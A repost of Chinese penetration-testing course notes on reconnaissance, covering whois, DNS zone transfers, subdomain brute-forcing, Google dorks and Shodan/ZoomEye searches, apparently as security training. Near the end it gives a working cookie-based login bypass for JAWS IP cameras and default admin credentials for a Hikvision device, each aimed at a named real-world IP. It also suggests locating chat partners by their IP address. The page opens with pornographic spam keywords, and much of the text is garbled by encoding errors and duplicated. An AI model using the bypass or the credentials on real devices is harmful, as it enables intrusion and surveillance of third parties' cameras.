日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 >

【CyberSecurityLearning 53】信息收集

發(fā)布時(shí)間:2025/3/15 38 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【CyberSecurityLearning 53】信息收集 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

目錄

信息收集

DNS 信息

whois查詢

域傳送漏洞

實(shí)驗(yàn):子域名爆破

工具:

DNS2IP

ping

nslookup

信息收集

DNS 信息

whois查詢

子域名查詢

域傳送漏洞

實(shí)驗(yàn):子域名爆破

工具:

DNS2IP

ping

nslookup

dig工具

dnsenum(推薦)

利用站長工具

CDN 加速問題

IP 查詢

IP 查詢

同IP 網(wǎng)站查詢(重要)

IP whois 查詢

IP2Location

查詢IP 地址經(jīng)緯度

通過GPS 查詢物理位置

利用搜索引擎搜集信息

Google hacking

探索網(wǎng)站目錄結(jié)構(gòu)

搜索容易存在sql 注入的頁面

搜索指定的文件類型

搜索phpinfo()

搜索phpstudy

搜索php 探針

鐘馗之眼

搜索iis6.0 組件

搜索開啟3389 端口的windows 主機(jī)

shodan(推薦)

網(wǎng)站信息收集

實(shí)驗(yàn):shodan(上面的截圖是步驟)


信息收集

為什么學(xué)習(xí)這節(jié)課程

在劃定了測試范圍之后,就需要進(jìn)入信息收集階段。在這個(gè)階段,滲透人員需要使用各種公共資源盡可能地獲取測試目標(biāo)的相關(guān)信息。他們從互聯(lián)網(wǎng)上搜集信息的渠道主要有:

@

論壇

@

公告板

@

新聞組

@

媒體文章

@

博客

@

社交網(wǎng)絡(luò)

@

其他商業(yè)或非商業(yè)性網(wǎng)站

@

GitHub

….

此外,他們也可以借助各種搜索引擎中獲取相關(guān)數(shù)據(jù),如谷歌、雅虎、MSN必應(yīng)、百度等。收集信息主要包括DNS 服務(wù)器、路由關(guān)系、whois 數(shù)據(jù)庫、電子郵件地址、電話號碼、個(gè)人信息以及用戶賬戶。收集信息越多,滲透測試成功的概率越高

本課程以[testfire.net]為目標(biāo),testfire.net 是IBM 公司為了演示旗下比較有名的Web 漏洞掃描器AppScan 的強(qiáng)大功能所搭建的模擬銀行網(wǎng)站,所以上面會(huì)有很多常見的Web 安全漏洞

類似的測試網(wǎng)站

[http://vulnweb.com/],為了演示AVWS

可以拿上面兩個(gè)網(wǎng)站去練手

?

DNS 信息

在收集DNS 信息的時(shí)候,主要關(guān)注域名或注冊商,管理員聯(lián)系方式,電話和郵箱,子域名等信息。

  • whois查詢

whois是一個(gè)集成在kali 虛擬機(jī)中的小工具
whois工具可以用來查詢域名注冊信息

[whois domain]

[whois testfire.net]

也可以通過站長之家進(jìn)行whois 查詢[http://whois.chinaz.com]

除了whois 查詢以外,還可以進(jìn)行反查。

@

郵箱反查

@

注冊人反查

@

電話反查

子域名查詢

可以查詢子域名的網(wǎng)站[https://searchdns.netcraft.com/],這種方法查詢大型網(wǎng)站比較有優(yōu)勢

@方法1

Netcraft.com

@方法2

證書(點(diǎn)一下那個(gè)小鎖--更多信息)

  • 域傳送漏洞

?

DNS區(qū)域傳送指的是一臺(tái)備用服務(wù)器使用來自主服務(wù)器的數(shù)據(jù)刷新自己的域數(shù)據(jù)庫。這為運(yùn)行中的DNS 服務(wù)提供了一定的冗余度,其目的是為了防止主域名服務(wù)器因?yàn)橐馔夤收献兊貌豢捎脮r(shí)影響到整個(gè)域名的解析。一般來說,DNS區(qū)域傳送操作只在網(wǎng)絡(luò)中真的有備用域名服務(wù)器的時(shí)候才有必要用到,但是許多DNS服務(wù)器卻被錯(cuò)誤的配置成只要有client 發(fā)出請求,就會(huì)像對方提供一個(gè)zone 的數(shù)據(jù)庫的詳細(xì)信息,所以說允許不受信任的英特網(wǎng)用戶執(zhí)行DNS區(qū)域傳送操作是后果最為嚴(yán)重的錯(cuò)誤配置之一。

可以使用dig 工具來檢測域傳送漏洞,命令如下
[dig axfr @dns.example.com example.com]
dig axfr? @your-ip www.vulhub.org
dig axfr @172.16.132.1 www.vulhub.org

kali中有dig工具

通過域傳送漏洞,可以得到子域名信息,和網(wǎng)站的子域名對應(yīng)的ip地址
?

實(shí)驗(yàn):子域名爆破

  • 工具:子域名挖掘機(jī)
  • dnsrecon

[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]

現(xiàn)在的子域名爆破越來越不靠譜,但是還是要了解一下

子域名挖掘機(jī)的字典是dic.txt(程序?qū)懰懒说?#xff09;

準(zhǔn)備一個(gè)字典寫上所有的域名(4個(gè)字母左右別超過10個(gè))。字典中的每個(gè)單詞,依次去嘗試

工具不重要,重要的是字典

工具:

1、layer(子域名挖掘機(jī))

2、dnsrecon(kali自帶)

dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt

-d???????? 指定域名
-D??????? 指定字典 (給絕對路徑)
-t brt ?? 指定枚舉形式? 爆破(指定模式)

DNS2IP

通過DNS 解析找到IP地址

  • ping

非權(quán)威解答

ping testfire.net
65.61.137.117

ping baidu.com
39.156.69.79

ping www.baidu.com
36.152.44.95

  • nslookup

testfire.net????? 65.61.137.117

------------

> testfire.net

Server:??????????????? 192.168.1.2

Address:??????? 192.168.1.2#53

?

Non-authoritative answer:

Name:??????? testfire.net

Address: 65.61.137.117

------

------------

> baidu.com

Server:??????????????? 192.168.1.2

Address:??????? 192.168.1.2#53

?

Non-authoritative answer:

Name:??????? baidu.com

Address: 39.156.69.79

Name:??????? baidu.com

Address: 220.181.38.148

------

?


信息收集

為什么學(xué)習(xí)這節(jié)課程

在劃定了測試范圍之后,就需要進(jìn)入信息收集階段。在這個(gè)階段,滲透人員需要使用各種公共資源盡可能地獲取測試目標(biāo)的相關(guān)信息。他們從互聯(lián)網(wǎng)上搜集信息的渠道主要有:

@

論壇

@

公告板

@

新聞組

@

媒體文章

@

博客

@

社交網(wǎng)絡(luò)

@

其他商業(yè)或非商業(yè)性網(wǎng)站

@

GitHub

….

?

此外,他們也可以借助各種搜索引擎中獲取相關(guān)數(shù)據(jù),如谷歌、雅虎、MSN必應(yīng)、百度等。收集信息主要包括DNS 服務(wù)器、路由關(guān)系、whois 數(shù)據(jù)庫、電子郵件地址、電話號碼、個(gè)人信息以及用戶賬戶。收集信息越多,滲透測試成功的概率越高

?

本課程以[testfire.net]為目標(biāo),testfire.net 是IBM 公司為了演示旗下比較有名的Web 漏洞掃描器AppScan 的強(qiáng)大功能所搭建的模擬銀行網(wǎng)站,所以上面會(huì)有很多常見的Web 安全漏洞

類似的測試網(wǎng)站

[http://vulnweb.com/]

?

DNS 信息

在收集DNS 信息的時(shí)候,主要關(guān)注域名或注冊商,管理員聯(lián)系方式,電話和郵箱,子域名等信息。

?

  • whois查詢

whois是一個(gè)集成在kali 虛擬機(jī)中的小工具

whois工具可以用來查詢域名注冊信息。

?

[whois domain]

[whois testfire.net]

也可以通過站長之家進(jìn)行whois 查詢[http://whois.chinaz.com]

?

除了whois 查詢以外,還可以進(jìn)行反查。

?

@

郵箱反查

@

注冊人反查

@

電話反查

?

?

?

  • 子域名查詢

可以查詢子域名的網(wǎng)站[https://searchdns.netcraft.com/],這種方法查詢大型網(wǎng)站比較有優(yōu)勢

@

Netcraft.com

@

證書

?

  • 域傳送漏洞

DNS區(qū)域傳送指的是一臺(tái)備用服務(wù)器使用來自主服務(wù)器的數(shù)據(jù)刷新自己的域數(shù)據(jù)庫。這為運(yùn)行中的DNS 服務(wù)提供了一定的冗余度,其目的是為了防止主域名服務(wù)器因?yàn)橐馔夤收献兊貌豢捎脮r(shí)影響到整個(gè)域名的解析。一般來說,DNS區(qū)域傳送操作只在網(wǎng)絡(luò)中真的有備用域名服務(wù)器的時(shí)候才有必要用到,但是許多DNS服務(wù)器卻被錯(cuò)誤的配置成只要有client 發(fā)出請求,就會(huì)像對方提供一個(gè)zone 的數(shù)據(jù)庫的詳細(xì)信息,所以說允許不受信任的英特網(wǎng)用戶執(zhí)行DNS區(qū)域傳送操作是后果最為嚴(yán)重的錯(cuò)誤配置之一。

可以使用dig 工具來檢測域傳送漏洞,命令如下

[dig axfr @dns.example.com example.com]

?

通過域傳送漏洞

子域名信息

子域名對應(yīng)的IP地址

?

實(shí)驗(yàn):子域名爆破

  • 工具:子域名挖掘機(jī)
  • dnsrecon

[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]

?

準(zhǔn)備一個(gè)字典寫上所有的域名(4個(gè)字母左右別超過10個(gè))。字典中的每個(gè)單詞,依次去嘗試

工具不重要,重要的是字典

?

工具:

1、layer(子域名挖掘機(jī))

2、dnsrecon

dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt

-d 指定域名 -D 指定字典 -t 指定模式

?

?

DNS2IP

通過DNS 解析找到IP地址

  • ping

非權(quán)威解答

ping testfire.net

65.61.137.117

?

ping baidu.com

39.156.69.79

?

ping www.baidu.com

39.156.66.18

?

  • nslookup

testfire.net????? 65.61.137.117

------------

> testfire.net

Server:????????????????192.168.1.2

Address:????????192.168.1.2#53

?

Non-authoritative answer:

Name:????????testfire.net

Address: 65.61.137.117

------

------------

> baidu.com

Server:????????????????192.168.1.2

Address:????????192.168.1.2#53

?

Non-authoritative answer:

Name:????????baidu.com

Address: 39.156.69.79

Name:????????baidu.com

Address: 220.181.38.148

------

------------

> www.baidu.com

Server:????????????????192.168.1.2

Address:????????192.168.1.2#53

?

Non-authoritative answer:

www.baidu.com????????canonical name = www.a.shifen.com.

Name:????????www.a.shifen.com

Address: 39.156.66.14

Name:????????www.a.shifen.com

Address: 39.156.66.18

--------

?

  • dig工具

dig testfire.net

dig @8.8.8.8 testfire.net??? 指定dns服務(wù)器

dig +trace testfire.net???? 獲取域名的詳細(xì)解析過程

?

  • dnsenum(推薦)

dnsenum testfire.net

此處推薦dnsenum,此工具在解析域名的時(shí)候,會(huì)自動(dòng)檢測域傳送漏洞

  • 利用站長工具

http://tool.chinaz.com/dns/

路由追蹤

  • CDN 加速問題

CDN 是內(nèi)容分發(fā)網(wǎng)絡(luò)

本意是進(jìn)行節(jié)點(diǎn)緩存,是網(wǎng)站訪問速度加快。一般情況下是沒辦法得到目標(biāo)的網(wǎng)站的真實(shí)IP 的。關(guān)于SDN 加速可以作為一個(gè)課題。

參考資料如下:(獲取CDN)

https://www.t00ls.net/

http://www.91ri.org/6233.html

http://www.91ri.org/3563.html

IP 查詢

  • IP 查詢

http://ip.chinaz.com/65.61.137.117

  • 同IP 網(wǎng)站查詢(重要)

同一個(gè)IP 上的網(wǎng)站

1.1.1.1

A?????????????? B

A和B就是旁站的關(guān)系(同一個(gè)服務(wù)器上的兩個(gè)網(wǎng)站)“曲線救國”

1.1.1.*??????? C 段查詢

  • IP whois 查詢

  • IP2Location

65.61.137.117

  • 查詢IP 地址經(jīng)緯度

https://www.maxmind.com/zh/home

得到IP地址的大致經(jīng)緯度(40.9476, -73.8624)

這個(gè)ip地址對查公司來講不是特別準(zhǔn),查個(gè)人比較準(zhǔn)
你聊QQ的時(shí)候把它IP地址抓到,就知道地理位置

  • 通過GPS 查詢物理位置

http://www.gpsspg.com/maps.htm

利用搜索引擎搜集信息

  • Google hacking

Google 機(jī)器人,爬行全世界所有網(wǎng)站的內(nèi)容。Google hacker 就是利用搜索引擎語法,獲取有關(guān)網(wǎng)站的信息。

site

指定網(wǎng)站

""

包含關(guān)鍵字

inurl

在url 中出現(xiàn)的關(guān)鍵字

filetype

指定文件類型(不太好用)

  • 探索網(wǎng)站目錄結(jié)構(gòu)

"parent directory" site:testfire.net??? #搜索testfire.net 網(wǎng)站的parent directory關(guān)鍵字

?

  • 搜索容易存在sql 注入的頁面

site:testfire.net inurl:login

?

  • 搜索指定的文件類型

filetype pdf

  • 搜索phpinfo()

intext:"PHP Version" exit:php intest:"disabled" intext:"BuildDate" intext:"Syatem" intext:"allow_url_fopen"

  • 搜索phpstudy

  • 搜索php 探針

intitle:"php中文網(wǎng) 探針2014"

  • 鐘馗之眼

https://www.zoomeye.org/

ZoomEye 支持公網(wǎng)設(shè)備指紋檢索和Web 指紋檢索。網(wǎng)站指紋包括應(yīng)用名、版本、前端框架、后端框架、服務(wù)端語言、服務(wù)器操作系統(tǒng)、網(wǎng)站容器、內(nèi)容管理系統(tǒng)和數(shù)據(jù)等。

  • 搜索iis6.0 組件

app:"Microsoft IIS httpd" ver:"6.0"

  • 搜索開啟3389 端口的windows 主機(jī)

port:3389 OS:windows

shodan(推薦)

https://www.shodan.io/

JAWS/1.1(攝像頭)

網(wǎng)站信息收集

收集指紋信息

Web 服務(wù)器信息
??????????? netcraft.net

裝插件

火狐插件

Netcraft Extension

Wappalyzer

?

?

?

Hikvision

?

實(shí)驗(yàn):shodan(上面的截圖是步驟)

搜索JAWS/1.1

點(diǎn)擊第一個(gè)

在地址欄輸入IP:87.10.224.71

發(fā)現(xiàn)登陸不了

F12打開控制臺(tái),把下面代碼復(fù)制進(jìn)去

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

執(zhí)行后,你在url后加上/view2.html,發(fā)現(xiàn)進(jìn)去了

裝一下flash

直接在本地訪問一下比較好,點(diǎn)擊here

有的能訪問有的不能


試一下Hikvision

78.36.3.246

admin?? 12345

?

?

?

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 53】信息收集的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。